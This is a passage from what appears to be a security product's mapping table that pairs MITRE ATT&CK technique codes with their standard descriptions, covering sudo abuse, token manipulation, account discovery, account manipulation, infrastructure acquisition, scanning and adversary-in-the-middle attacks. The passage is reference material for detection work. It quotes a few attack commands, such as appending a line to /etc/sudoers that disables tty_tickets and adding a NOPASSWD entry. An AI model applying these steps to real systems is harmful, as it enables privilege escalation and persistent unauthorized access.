terminals with elevated privileges and to control who can perform these commands on the system. The
sudo command "allows a system administrator to delegate authority to give certain users (or groups of
users) the ability to run some (or all) commands as root or another user while providing an audit trail of the
commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system
administrator, it has some useful configuration features such as a timestamp_timeout, which is the
amount of time in minutes between instances of sudo before it will re-prompt for a password. This is
because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /
var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a
tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example,
the sudo timeout of one tty will not affect another tty (you will have to type the password again). The
sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals.
This also describes which commands users can run as other users or groups. This provides the principle of
least privilege such that users are running in their lowest possible permissions for most of the time and only
elevate to other users or permissions as needed, typically by prompting for a password. However, the
sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL)
NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without
needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls
within the timestamp_timeout range. If it does, then malware can execute sudo commands without
needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from
any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by
issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In
order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the
sudoers file has tty_tickets enabled by default. https://attack.mitre.org/techniques/T1548/003

T1134 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION Adversaries may modify access tokens to operate under a different user or system security context to
perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a
running process. A user can manipulate access tokens to make a running process appear as though it is
the child of a different process or belongs to someone other than the user that started the process. When
this occurs, the process also takes on the security context associated with the new token. An adversary can
use built-in Windows API functions to copy access tokens from existing processes; this is known as token
stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://
attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token]
(https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context
(i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their
security context from the administrator level to the SYSTEM level. An adversary can then use a token to
authenticate to a remote system as the account for that token if the account has appropriate permissions on
the remote system.(Citation: Pentestlab Token Manipulation) Any standard user can use the runas
command, and the Windows API functions, to create impersonation tokens; it does not require access to an
administrator account. There are also other mechanisms, such as Active Directory fields, that can be used
to modify access tokens. https://attack.mitre.org/techniques/T1134

T1134.002 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_CREATE_PROCESS_WITH_TOKEN Adversaries may create a new process with a different token to escalate privileges and bypass access
controls. Processes can be created with the token and resulting security context of another user using
features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes
with a different token may require the credentials of the target user, specific privileges to impersonate that
user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft]
(https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/
techniques/T1134/003)). https://attack.mitre.org/techniques/T1134/002

T1134.003 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_MAKE_AND_IMPERSONATE_TOKEN Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an
adversary has a username and password but the user is not logged onto the system, the adversary can
then create a logon session for the user using the LogonUser function. The function will return a copy of the
new session's access token and the adversary can use SetThreadToken to assign the token to a thread.
https://attack.mitre.org/techniques/T1134/003

T1134.004 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_PARENT_PID_SPOOFING Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring
defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling,
process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the
CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens
SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control
(UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via
svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning
directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process
relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/
[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office
document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://
attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform
[Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)
(Citation: CounterCept PPID Spoofing Dec 2018) Explicitly assigning the PPID may also enable elevated
privileges given appropriate access rights to the parent process. For example, an adversary in a privileged
user context (i.e. administrator) may spawn a new process and assign the parent as a process running as
SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.
(Citation: XPNSec PPID Nov 2017) https://attack.mitre.org/techniques/T1134/004
Original Mapped Description

T1134.005 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_SID_HISTORY_INJECTION Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows
security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows
security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold
additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute),
allowing inter-operable account migration between domains (e.g., all values in SID-History are included in
access tokens). With Domain Administrator (or equivalent) rights, harvested or well-known SID values
(Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation
of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated
access to local resources and/or access to otherwise inaccessible domains via lateral movement
techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin
Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://
attack.mitre.org/techniques/T1021/006). https://attack.mitre.org/techniques/T1134/005

T1134.001 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_TOKEN_IMPERSONATION_OR_THEFT Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access
controls. An adversary can create a new access token that duplicates an existing token using
DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling
thread to impersonate a logged on user's security context, or with SetThreadToken to assign the
impersonated token to a thread. An adversary may do this when they have a specific, existing process they
want to assign the new token to. For example, this may be useful for when the target user has a non-
network logon session on the system. https://attack.mitre.org/techniques/T1134/001

T1531 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_ACCESS_REMOVAL Adversaries may interrupt availability of system and network resources by inhibiting access to accounts
utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to
remove access to accounts. Adversaries may also subsequently log off and/or reboot boxes to set
malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
https://attack.mitre.org/techniques/T1531

T1087 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY Adversaries may attempt to get a listing of accounts on a system or within an environment. This information
can help adversaries determine which accounts exist to aid in follow-on behavior. https://attack.mitre.org/
techniques/T1087

T1087.004 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_CLOUD_ACCOUNT Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and
configured by an organization for use by users, remote support, services, or for administration of resources
within a cloud service provider or SaaS application. With authenticated access there are several tools that
can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account
names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation:
GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with
authenticated access to a domain. The command az ad user list will list all users within a domain.
(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) The AWS command
aws iam list-users may be used to obtain a list of users in the current account while aws iam list-
roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List
Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be
used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie
Accounts List API) https://attack.mitre.org/techniques/T1087/004

T1087.002 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_DOMAIN_ACCOUNT Adversaries may attempt to get a listing of domain accounts. This information can help adversaries
determine which domain accounts exist to aid in follow-on behavior. Commands such as net user /
domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil
-q groupon macOS, and ldapsearch on Linux can list domain users and groups. https://attack.mitre.org/
techniques/T1087/002

T1087.003 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_EMAIL_ACCOUNT Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump
Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists) In
on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be
used to obtain email addresses and accounts from a domain using an authenticated session.(Citation:
Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016) In Google
Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for
Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a
listing of other users within the organization.(Citation: Google Workspace Global Access List) https://
attack.mitre.org/techniques/T1087/003

T1087.001 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_LOCAL_ACCOUNT Adversaries may attempt to get a listing of local system accounts. This information can help adversaries
determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net
user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson
macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through
the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to
enumerate local accounts. https://attack.mitre.org/techniques/T1087/001

T1098 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may
consist of any action that preserves adversary access to a compromised account, such as modifying
credentials or permission groups. These actions could also include account activity designed to subvert
security policies, such as performing iterative password updates to bypass password duration policies and
preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must
already have sufficient permissions on systems or the domain. https://attack.mitre.org/techniques/T1098

T1098.003 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_ADD_OFFICE_365_GLOBAL_ADMINISTRATOR_ROLE An adversary may add the Global Administrator role to an adversary-controlled account to maintain
persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October
2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain
almost unlimited access to data and settings (including the ability to reset the passwords of other admins)
via the global admin role.(Citation: Microsoft O365 Admin Roles) This account modification may
immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account
activity. https://attack.mitre.org/techniques/T1098/003

T1098.001 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_ADDITIONAL_CLOUD_CREDENTIALS Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to
victim accounts and instances within the environment. Adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft
SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video)
These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure
Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure
AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their
own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute
os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to
instances within the cloud environment without further usage of the compromised cloud accounts.(Citation:
Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) https://attack.mitre.org/techniques/T1098/001
Original Mapped Description

T1098.002 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_EXCHANGE_EMAIL_DELEGATE_PERMISSIONS Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain
persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell]
(https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the
cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-
MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles.
Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information
Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the
adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail
folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents
where an adversary can assign more access rights to the accounts they wish to compromise. This may
further enable use of additional techniques for gaining access to systems. For example, compromised
business accounts are often used to send messages to other accounts in the network of the target business
while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the
messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
https://attack.mitre.org/techniques/T1098/002

T1098.004 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_SSH_AUTHORIZED_KEYS Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux
distributions and macOS commonly use key-based authentication to secure the authentication process of
SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can
be used for logging into the user account for which the file is configured. This file is usually found in the
user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys)
Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and
RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH
config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH
authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public
keys. This ensures that an adversary possessing the corresponding private key may log in as an existing
user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) https://
attack.mitre.org/techniques/T1098/004

T1583 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of
infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include
physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease)
Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows an
adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in
with traffic that is seen as normal, such as contact to third-party web services. Depending on the
implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as
well as utilize infrastructure that can be rapidly provisioned, modified, and shut down. https://
attack.mitre.org/techniques/T1583

T1583.005 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_BOTNET Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting.
A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.
(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/
stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-
scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).
(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)
https://attack.mitre.org/techniques/T1583/005

T1583.002 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_DNS_SERVER Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting.
During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for
Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead
of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in
support of operations. By running their own DNS servers, adversaries can have more control over how they
administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control
over a DNS server, adversaries can configure DNS applications to provide conditional responses to
malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42
DNS Mar 2019) https://attack.mitre.org/techniques/T1583/002

T1583.001 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_DOMAINS Adversaries may purchase domains that can be used during targeting. Domain names are the human
readable names used to represent one or more IP addresses. They can be purchased or, in some cases,
acquired for free. Adversaries can use purchased domains for a variety of purposes, including for [Phishing]
(https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/
T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that
are similar to legitimate domains, including through use of homoglyphs or use of a different top-level
domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in
delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can
also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in
operations.(Citation: CISA IDN ST05-016) Domain registrars each maintain a publicly viewable database
that displays contact information for every registered domain. Private WHOIS services display alternative
information, such as their own company data, rather than the owner of the domain. Adversaries may use
such private WHOIS services to obscure information about who owns a purchased domain. Adversaries
may further interrupt efforts to track their infrastructure by using varied registration information and
purchasing domains with different domain registrars.(Citation: Mandiant APT1) https://attack.mitre.org/
techniques/T1583/001

T1583.004 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_SERVER Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers
allows an adversary to stage, launch, and execute an operation. During post-compromise activity,
adversaries may utilize servers for various tasks, including for Command and Control. Instead of
compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual
Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run
their own servers in support of operations. Adversaries may only need a lightweight setup if most of their
activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if
they want to test, communicate, and control other aspects of their activities on their own systems.(Citation:
NYTStuxnet) https://attack.mitre.org/techniques/T1583/004

T1583.003 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_VIRTUAL_PRIVATE_SERVER Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety
of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS,
adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure
can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow
adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers.
Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs
with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation:
TrendmicroHideoutsLease) https://attack.mitre.org/techniques/T1583/003

T1583.006 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_WEB_SERVICES Adversaries may register for web services that can be used during targeting. A variety of popular websites
exist for adversaries to register for a web-based service that can be abused during later stages of the
adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/
techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using
common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in
expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations
to them. https://attack.mitre.org/techniques/T1583/006
Original Mapped Description

T1595 XDM_CONST.MITRE_TECHNIQUE_ACTIVE_SCANNING Adversaries may execute active reconnaissance scans to gather information that can be used during
targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as
opposed to other forms of reconnaissance that do not involve direct interaction. Adversaries may perform
different forms of active scanning depending on what information they seek to gather. These scans can also
be performed in various ways, including using native features of network protocols such as ICMP.(Citation:
Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for
other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing
operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain
Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote
Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://
attack.mitre.org/techniques/T1190)). https://attack.mitre.org/techniques/T1595

T1595.001 XDM_CONST.MITRE_TECHNIQUE_ACTIVE_SCANNING_SCANNING_IP_BLOCKS Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP
addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries
may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/
T1590), such as which IP addresses are actively in use as well as more detailed information about hosts
assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more
nuanced scans that may reveal host software/versions via server banners or other network artifacts.
(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of
reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities]
(https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1595/001

T1595.002 XDM_CONST.MITRE_TECHNIQUE_ACTIVE_SCANNING_VULNERABILITY_SCANNING Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans
typically check if the configuration of a target host/application (ex: software and version) potentially aligns
with the target of a specific exploit the adversary may seek to use. These scans may also include more
broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be
used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest
running software and version numbers via server banners, listening ports, or other network artifacts.
(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of
reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities]
(https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application]
(https://attack.mitre.org/techniques/T1190)). https://attack.mitre.org/techniques/T1595/002

T1557 XDM_CONST.MITRE_TECHNIQUE_ADVERSARY_IN_THE_MIDDLE Adversaries may attempt to position themselves between two or more networked devices using an
adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://
attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/
T1565/002). By abusing features of common networking protocols that can determine the flow of network
traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary
controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM
Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted
Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from
flowing to the appropriate destination, causing denial of service. https://attack.mitre.org/techniques/T1557

T1557.002 XDM_CONST.MITRE_TECHNIQUE_ADVERSARY_IN_THE_MIDDLE_ARP_CACHE_POISONING Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the
communication of two or more networked devices. This activity may be used to enable follow-on behaviors
such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation]
(https://attack.mitre.org/techniques/T1565/002). The ARP protocol is used to resolve IPv4 addresses to link
layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local
network segment communicate with each other by using link layer addresses. If a networked device does
not have the link layer address of a particular networked device, it may send out a broadcast ARP request
to the local network to translate the IP address to a MAC address. The device with the associated IP
address directly replies with its MAC address. The networked device that made the ARP request will then
use as well as store that information in its ARP cache. An adversary may passively wait for an ARP request
to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus
deceiving the victim by making them believe that they are communicating with the intended networked
device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the
legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces
the ownership of a particular IP address to all the devices in the local network segment. The ARP protocol
is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC
address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance
Cleaver) Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity
may be used to collect and/or relay data such as credentials, especially those sent over an insecure,
unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003) https://attack.mitre.org/techniques/
T1557/002

T1557.001 XDM_CONST.MITRE_TECHNIQUE_ADVERSARY_IN_THE_MIDDLE_LLMNR_NBT_NS_POISONING_AND_SMB_RELAY By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name
resolution to force communication with an adversary controlled system. This activity may be used to collect
or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name
Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host
identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same
local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their
NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS) Adversaries can spoof an
authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS
(UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that
the victims will communicate with the adversary controlled system. If the requested host belongs to a
resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the
adversary controlled system. The adversary can then collect the hash information sent over the wire
through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/
techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/
T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is
in the authentication path between systems or when automated scans that use credentials attempt to
authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to
access and execute code against a target system. The relay step can happen in conjunction with poisoning
but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB
Relay) Several tools exist that can be used to poison name services within local networks such as
NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub
NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder) https://attack.mitre.org/
techniques/T1557/001

T1071 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL Adversaries may communicate using application layer protocols to avoid detection/network filtering by
blending in with existing traffic. Commands to the remote system, and often the results of those commands,
